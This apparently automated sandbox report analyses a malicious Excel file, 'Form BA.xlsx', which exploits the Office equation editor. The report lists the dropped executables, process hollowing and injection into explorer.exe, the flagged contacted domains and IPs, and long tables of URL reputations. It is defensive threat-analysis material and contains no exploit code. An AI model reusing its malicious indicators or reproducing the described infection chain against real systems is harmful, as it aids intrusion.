      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452641 Sample: Form BA.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 37 www.800pls.info 2->37 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 14 other signatures 2->59 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        signatures3 process4 dnsIp5 39 3.121.113.175, 49165, 80 AMAZON-02US United States 10->39 31 C:\Users\user\AppData\Local\...\pool[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->79 17 vbc.exe 10->17         started        35 C:\Users\user\Desktop\~$Form BA.xlsx, data 15->35 dropped file6 signatures7 process8 signatures9 47 Machine Learning detection for dropped file 17->47 49 Tries to detect virtualization through RDTSC time measurements 17->49 51 Injects a PE file into a foreign processes 17->51 20 vbc.exe 17->20         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 20->61 63 Maps a DLL or memory area into another process 20->63 65 Sample uses process hollowing technique 20->65 67 Queues an APC in another process (thread injection) 20->67 23 rundll32.exe 20->23         started        26 explorer.exe 20->26 injected process12 dnsIp13 69 Modifies the context of a thread in another process (thread injection) 23->69 71 Maps a DLL or memory area into another process 23->71 73 Tries to detect virtualization through RDTSC time measurements 23->73 29 cmd.exe 23->29         started        41 intoxickiss.com 151.101.0.119, 49167, 80 FASTLYUS United States 26->41 43 www.pon.xyz 26->43 45 2 other IPs or domains 26->45 75 System process connects to network (likely due to code injection or exploit) 26->75 77 Performs DNS queries to domains with low reputation 26->77 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Form BA.xlsx31%VirustotalBrowse
      Form BA.xlsx30%ReversingLabsWin32.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe100%Joe Sandbox ML
      C:\Users\Public\vbc.exe100%Joe Sandbox ML

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      6.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      6.2.vbc.exe.8967b0.2.unpack100%AviraTR/ATRAPS.GenDownload File
      6.3.vbc.exe.8967b0.0.unpack100%AviraTR/ATRAPS.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.google.com.br/0%Avira URL Cloudsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      www.gaigoilaocai.com/wufn/0%Avira URL Cloudsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://www.google.com.tw/0%Avira URL Cloudsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      71822.bodis.com
      		199.59.242.153
      		truefalse
        		high
        intoxickiss.com
        		151.101.0.119
        		truetrue
          		unknown
          www.800pls.info
          		unknown
          		unknowntrue
            		unknown
            www.pon.xyz
            		unknown
            		unknowntrue
              		unknown
              www.intoxickiss.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.gaigoilaocai.com/wufn/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.google.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  		high
                  http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://search.ebay.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mtv.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.rambler.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://buscar.ya.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://asp.usatoday.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://rover.ebay.comexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://search.ebay.in/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://msk.afisha.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.google.com.tw/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://search.rediff.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://search.naver.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.google.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://search.daum.net/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://buscar.ozu.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.about.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.ask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.cjmall.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://search.centrum.cz/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://suche.t-online.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.google.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.auction.co.kr/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.ceneo.pl/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.amazon.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://sads.myspace.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://search.sify.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://search.ebay.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://search.nifty.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.google.si/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.google.cz/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.soso.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.univision.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  199.59.242.153
